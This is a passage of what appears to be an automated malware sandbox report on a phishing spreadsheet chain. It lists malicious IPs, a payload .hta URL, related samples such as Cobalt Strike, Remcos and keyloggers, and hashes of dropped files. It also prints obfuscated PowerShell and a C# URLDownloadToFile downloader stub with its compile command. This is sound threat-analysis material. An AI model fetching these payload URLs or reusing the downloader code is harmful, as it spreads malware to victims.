                                                                          26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                          • 23.95.128.215/226/wc/greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          ip.3105.filemail.comPedido No 4500924462.xlsGet hashmaliciousUnknownBrowse
                                                                          • 193.30.119.205
                                                                          26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                          • 193.30.119.205
                                                                          List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                          • 193.30.119.205
                                                                          Inquiry.jsGet hashmaliciousUnknownBrowse
                                                                          • 193.30.119.205
                                                                          Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                          • 193.30.119.205
                                                                          creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                          • 193.30.119.205
                                                                          sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                          • 193.30.119.205
                                                                          thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                          • 193.30.119.205
                                                                          Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 193.30.119.205
                                                                          New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                          • 193.30.119.205

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          AS-COLOCROSSINGUSniceidea.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                          • 192.3.95.197
                                                                          Order Summary.xlsGet hashmaliciousUnknownBrowse
                                                                          • 104.168.46.26
                                                                          Order Summary.xlsGet hashmaliciousUnknownBrowse
                                                                          • 104.168.46.26
                                                                          Order Summary.xlsGet hashmaliciousUnknownBrowse
                                                                          • 104.168.46.26
                                                                          container payment.xlsGet hashmaliciousUnknownBrowse
                                                                          • 107.175.113.196
                                                                          Payment Advice.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                          • 192.3.95.197
                                                                          Pedido No 4500924462.xlsGet hashmaliciousUnknownBrowse
                                                                          • 23.95.128.215
                                                                          26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                          • 23.95.128.215
                                                                          container payment.xlsGet hashmaliciousUnknownBrowse
                                                                          • 107.175.113.196
                                                                          container payment.xlsGet hashmaliciousUnknownBrowse
                                                                          • 107.175.113.196
                                                                          DFNVereinzurFoerderungeinesDeutschenForschungsnetzesem68k.elfGet hashmaliciousUnknownBrowse
                                                                          • 141.89.70.14
                                                                          powerpc.elfGet hashmaliciousUnknownBrowse
                                                                          • 134.28.103.153
                                                                          arm5.elfGet hashmaliciousUnknownBrowse
                                                                          • 139.20.77.10
                                                                          jmggnxeedy.elfGet hashmaliciousUnknownBrowse
                                                                          • 137.250.32.211
                                                                          https://michiganchronicle.com/philanthropy-under-siege-how-the-fight-against-the-fearless-fund-threatens-black-womens-progress-in-detroit/Get hashmaliciousUnknownBrowse
                                                                          • 141.95.124.137
                                                                          Pedido No 4500924462.xlsGet hashmaliciousUnknownBrowse
                                                                          • 193.30.119.205
                                                                          26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                          • 193.30.119.205
                                                                          List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                          • 193.30.119.205
                                                                          Inquiry.jsGet hashmaliciousUnknownBrowse
                                                                          • 193.30.119.205
                                                                          pbnpvwfhco.elfGet hashmaliciousUnknownBrowse
                                                                          • 141.36.226.152

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          3b5074b1b5d032e5620f69f9f700ff0eOrder SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                          • 193.30.119.205
                                                                          NF---710.msiGet hashmaliciousAteraAgentBrowse
                                                                          • 193.30.119.205
                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                          • 193.30.119.205
                                                                          Teklif Talebi__77252662______PDF_PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                          • 193.30.119.205
                                                                          ORDEN DE COMPRA.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                          • 193.30.119.205
                                                                          hesaphareketi-01-27112024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 193.30.119.205
                                                                          Teklif_PDF.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                          • 193.30.119.205
                                                                          New_June_products_list_Needed_pdf.scr.exeGet hashmaliciousUnknownBrowse
                                                                          • 193.30.119.205
                                                                          Arab Bank_ Payment Advice doc.pdf.scr.exeGet hashmaliciousUnknownBrowse
                                                                          • 193.30.119.205
                                                                          ORDEN DE COMPRA.pdf.lnkGet hashmaliciousLokibotBrowse
                                                                          • 193.30.119.205

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\seethepossiblethingsforentiretimetogivemebest[1].tiff

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (431), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):165320
                                                                          Entropy (8bit):3.9154650100951054
                                                                          Encrypted:false
                                                                          SSDEEP:3072:cQKStd/roV5KEwdQKStd/roV5KEwzQKStd/roV5KEwt:hK2d/rY5KBuK2d/rY5KBsK2d/rY5KBt
                                                                          MD5:5BE16D230E88F7D40E09E2E938446071
                                                                          SHA1:668C33BA360AE4E37B8C440DA266F5CFAFCD4750
                                                                          SHA-256:B7390070E99BA85CF154363319100F6D6E201CB6570C90C6FC132F16CB218AE0
                                                                          SHA-512:8EC25D49B3065689B779D1AE5993CA2DF3608DF81648479F138C47CB7B51D92D9DA73B4E39C910EB0EE0D88297BA93B0E2B77B58B1B927F5D9A79AE1AB66E651
                                                                          Malicious:false
                                                                          Preview:..........U.I.K.p.Z.P.R.v.l.e.L.i.m.n.z. .=. .".q.U.i.m.W.f.A.L.a.c.I.C.H.l.g.".....p.b.t.L.W.U.h.L.W.B.U.s.r.p.W. .=. .".k.U.G.i.K.p.x.L.q.P.x.j.C.p.b.".....W.k.h.i.p.Z.l.W.n.h.z.n.p.W.q. .=. .".h.W.a.L.A.c.v.j.U.q.N.k.W.B.J.".....G.G.h.Z.U.K.z.n.A.z.d.b.m.h.l. .=. .".q.o.G.Z.U.W.U.B.i.T.q.K.P.i.i.".....i.v.m.o.d.K.L.B.U.h.W.k.L.i.G. .=. .".k.i.d.p.U.L.u.L.P.U.k.O.W.B.N.".....e.R.B.U.f.W.U.n.g.c.L.i.A.Z.t. .=. .".b.i.G.J.d.Q.K.O.S.J.f.d.f.b.j.".........Z.l.l.B.W.A.W.W.P.R.i.g.c.W.W. .=. .".e.W.c.h.z.G.K.R.p.a.H.i.U.K.L.".....k.m.O.W.j.h.W.z.l.B.L.N.b.T.C. .=. .".W.C.H.S.C.i.K.W.t.U.S.L.W.B.c.".....J.N.Z.l.e.G.A.i.H.W.G.o.z.m.i. .=. .".d.c.O.f.O.L.t.t.t.l.u.r.K.e.L.".........c.W.d.c.P.r.Q.f.I.n.Q.z.f.r.K. .=. .".B.T.G.o.U.q.f.C.o.z.g.t.e.x.k.".....k.i.u.m.u.o.b.h.h.Z.i.c.x.G.b. .=. .".U.W.I.W.p.i.J.u.s.O.m.f.S.c.a.".....b.G.g.m.e.L.k.W.l.A.C.L.R.U.A. .=. .".a.a.Z.t.c.Q.N.W.i.W.b.o.z.m.L.".....C.n.o.W.U.W.h.i.e.L.i.P.u.T.t. .=. .".u.c.a.r.t.a.p.e.l.e.U.A.p.f.W.i.A.C.W.L.k.G.".....s.U.o.

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):0.742582331134527
                                                                          Encrypted:false
                                                                          SSDEEP:3:Nlllulv/:NllUv
                                                                          MD5:80DF4908B623122110876B0E4F96E511
                                                                          SHA1:6BD95B95B5A946231A0502DAF607C7BCC7A91E14
                                                                          SHA-256:02A792070E93EF52A2589FE036C9F20DC47DC669C5283DB7BEDE252423637C18
                                                                          SHA-512:A6E1ABAB64AAD9E7981C440DEC7DCF9136F4A9C9C76AFBF53C8790D4DC4F9F71245B778F71970DEAE04D5261AD63886A8E9001A60C3492FB007513E90EB8D2B2
                                                                          Malicious:false
                                                                          Preview:@...e...................................e.......................

                                                                          C:\Users\user\AppData\Local\Temp\RES2022.tmp

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Nov 28 08:01:16 2024, 1st section name ".debug$S"
                                                                          Category:dropped
                                                                          Size (bytes):1328
                                                                          Entropy (8bit):3.9741995410170654
                                                                          Encrypted:false
                                                                          SSDEEP:24:H0e9ERhfGzhXDfHYWwKEbsmfII+ycuZhNFakSzPNnqSqd:IczYKPmg1ulFa35qSK
                                                                          MD5:B0C9C1A1E6D71F6421D073AD20C2D352
                                                                          SHA1:5357002B571F172947CE09E2B30831519D45132D
                                                                          SHA-256:380DC5AE0DE169528B34677AC3F2A3C2DFD6161BDB7CD4C4CE95CB53C55BC779
                                                                          SHA-512:E4CE3F960F9C7A47BA3ED59451ED036347BFB6EDE3310143F948532F51FB6606C29B7A7E7E32FD61F2DECE06524595A511944EFC1EB807782A32A23AD778B5EC
                                                                          Malicious:false
                                                                          Preview:L...L#Hg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........R....c:\Users\user\AppData\Local\Temp\w0uathue\CSC6F7F1D769E649D6AA11CFF4BFABFB3.TMP..................!..J.......~...........4.......C:\Users\user\AppData\Local\Temp\RES2022.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.0.u.a.t.h.u.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0rb2i04m.5va.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ayhsoar1.oag.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_evlfb0rh.pdo.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkhifito.fr5.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qy1upgcx.wg0.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sav041qg.kjd.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vk1amv3d.iwu.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5e4h1pl.1ss.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ycka52aq.epd.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yuf5sy3j.jg1.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\w0uathue\CSC6F7F1D769E649D6AA11CFF4BFABFB3.TMP

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                          File Type:MSVC .res
                                                                          Category:dropped
                                                                          Size (bytes):652
                                                                          Entropy (8bit):3.0862464220576102
                                                                          Encrypted:false
                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryw1Gak7Ynqqx1XPN5Dlq5J:+RI+ycuZhNFakSzPNnqX
                                                                          MD5:E521BEEA8F4A7FD3C298B9029FB77EF1
                                                                          SHA1:BBE3CFA1020E08FBC89E3D5584649582F307C46A
                                                                          SHA-256:1907E380871258BF26C963677CDA787E0845D15C742735519BB31AF70DA86DA4
                                                                          SHA-512:DD41E89AABAD79D0A845D2C272824945F71E8858389D87F1C8546AD36544F824E46AFA403513FDFA1BFC78E07F91BF417908D6B287D721BFCE484FE22B168F60
                                                                          Malicious:false
                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.0.u.a.t.h.u.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.0.u.a.t.h.u.e...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                          C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.0.cs

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (363)
                                                                          Category:dropped
                                                                          Size (bytes):478
                                                                          Entropy (8bit):3.717417030035401
                                                                          Encrypted:false
                                                                          SSDEEP:6:V/DsYLDS81zuY4/0udMmFBDQXReKJ8SRHy4HWRbU4u/gc4oFYy:V/DTLDfuY4BbuXfH5746FYy
                                                                          MD5:0FBA8F5ECED8DF1E891AA99C6185006F
                                                                          SHA1:21FB2EA775E538A687DA4ABE2D80903C99C0E2A4
                                                                          SHA-256:CA9F0F623B9A0A49AE34855E179B548242D9EE531C2D79EF7EB7E99FDF68BEF7
                                                                          SHA-512:A832A3FE155ACE34E53AF8104F1B9731A072B77801B407020BDC68EEC14CEE2976575A4CB3DA7943DEA052DE082B1A1A23C909EC9CE38A43303A8A2F505F3F33
                                                                          Malicious:false
                                                                          Preview:.using System;.using System.Runtime.InteropServices;..namespace yqaLWfmp.{. public class cTn. {. [DllImport("UrLMon.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr jl,string yNzxn,string tYuY,uint QjUWlwdaCZW,IntPtr wA);.. }..}.

                                                                          C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):369
                                                                          Entropy (8bit):5.203225906435676
                                                                          Encrypted:false
                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fkDKDVUzxs7+AEszIwkn23fkDKDhLx:p37Lvkmb6KRfGKDqWZEifGKDhLx
                                                                          MD5:4C03A98DA406D1223A21B8EDC20E7892
                                                                          SHA1:5B960BF41954C96B3B35823E04D5E9E8481B0E92
                                                                          SHA-256:D2B5859C7A73053D933D687F60FA0CBC6EC5225030C084D655329B56A09464DB
                                                                          SHA-512:74F706C1EE785B578E003FD1D5526D1A0F24DAC9B4868A27A812EBCFEC3E41776252EC62F22D14A6879CE984A483318FAB97B6760E589F0BD57B32B04DAE34A9
                                                                          Malicious:true
                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.0.cs"

                                                                          C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.dll

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):3072
                                                                          Entropy (8bit):2.8081586919340844
                                                                          Encrypted:false
                                                                          SSDEEP:24:etGSGPBu5exl8ceOkpeS028tjiFtkZfR0mWqVSjcUWI+ycuZhNFakSzPNnq:6lsx+ZoFjiwJWmWqVSA31ulFa35q
                                                                          MD5:9F85399D3971EA4308BFEA4EAD758A82
                                                                          SHA1:7BF628F08CC12A020EB74E8562E41F22526D13C2
                                                                          SHA-256:4D9CDCF3105E75A933978067D6D9F355AD212EDEBBACCC8111FE68504D7BA8C9
                                                                          SHA-512:8E93EA51A8146D90085399FEC56E2B4340D52063D7F262EB403F90B6D37DF5A2B6F5849BC3A4F1CC1A6407F20587AA01C8EDCAEF438A9D93D8F966049F3BB65E
                                                                          Malicious:false
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L#Hg...........!.................#... ...@....... ....................................@.................................T#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................4.-.....p.....p.......................................... ;.....P ......M.........S.....V.....\.....a.....m...M.....M...!.M.....M.......!.....*.......;.......................................$..........<Module>.w0

                                                                          C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.out

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                                          Category:modified
                                                                          Size (bytes):867
                                                                          Entropy (8bit):5.292583775439026
                                                                          Encrypted:false
                                                                          SSDEEP:24:KJBqd3ka6KRfGQLEifGQhLUKax5DqBVKVrdFAMBJTH:Cika6CHEuRUK2DcVKdBJj
                                                                          MD5:AC64CC288F4707F3ED6944EB7CEA65CF
                                                                          SHA1:FB2400883F392CAAC7849B9F99D1E9E9203C8E39
                                                                          SHA-256:D9CD3A531505C3F1B59545FA989494C3994989D300E3BA2CF09C85C6F6A4BF4D
                                                                          SHA-512:4F5AC35546C60C6640A6BA84E2BE2F13F4CA987C7DF5547F9C6B0815E01C3E6ADE04AA7E9FF7894D3386BEA8475A0F186B7470DFCE4DC014CCB292A84004A8E2
                                                                          Malicious:false
                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                          C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs

                                                                          Download File
